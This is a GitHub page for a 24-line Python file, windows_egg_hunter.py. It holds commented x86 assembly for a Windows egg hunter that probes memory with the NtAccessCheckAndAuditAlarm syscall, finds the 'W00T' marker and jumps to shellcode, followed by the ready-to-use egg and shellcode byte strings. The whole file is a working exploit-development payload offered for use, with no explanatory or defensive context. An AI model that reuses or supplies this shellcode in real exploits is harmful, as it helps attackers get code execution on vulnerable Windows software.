-
Notifications
You must be signed in to change notification settings - Fork 0
/
windows_egg_hunter.py
24 lines (23 loc) · 1.07 KB
/
windows_egg_hunter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# align_page:
# or dx,0xfff ; add PAGE_SIZE-1 to edx
# next_addr:
# inc edx ; increment our pointer by one
# loop_check:
# push edx ; holds our current memory location
# push 0x2 ; push NtAccessCheckAndAuditAlarm
# pop eax ; pop that into eax
# int 0x2e ; perform the syscall
# cmp al,0x5 ; check = 0xc0000005 (ACCESS_VIOLATION)
# pop edx ; restore edx
# jz align_page ; invalid ptr, go to next page
# is_egg:
# mov eax,0x57303054 ; egg goes in eax (W00T)
# mov edi,edx ; set edi to current memory location
# scasd ; compare eax/edi and increment edi 4 bytes
# jnz next_addr ; increment counter by one if no match
# scasd ; first 4 bytes matched, does other half?
# jnz next_addr ; increment counter by one if no match
# matched:
# jmp edi ; egg found! jump to our shellcode
egg = "\x54\x30\x30\x57"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"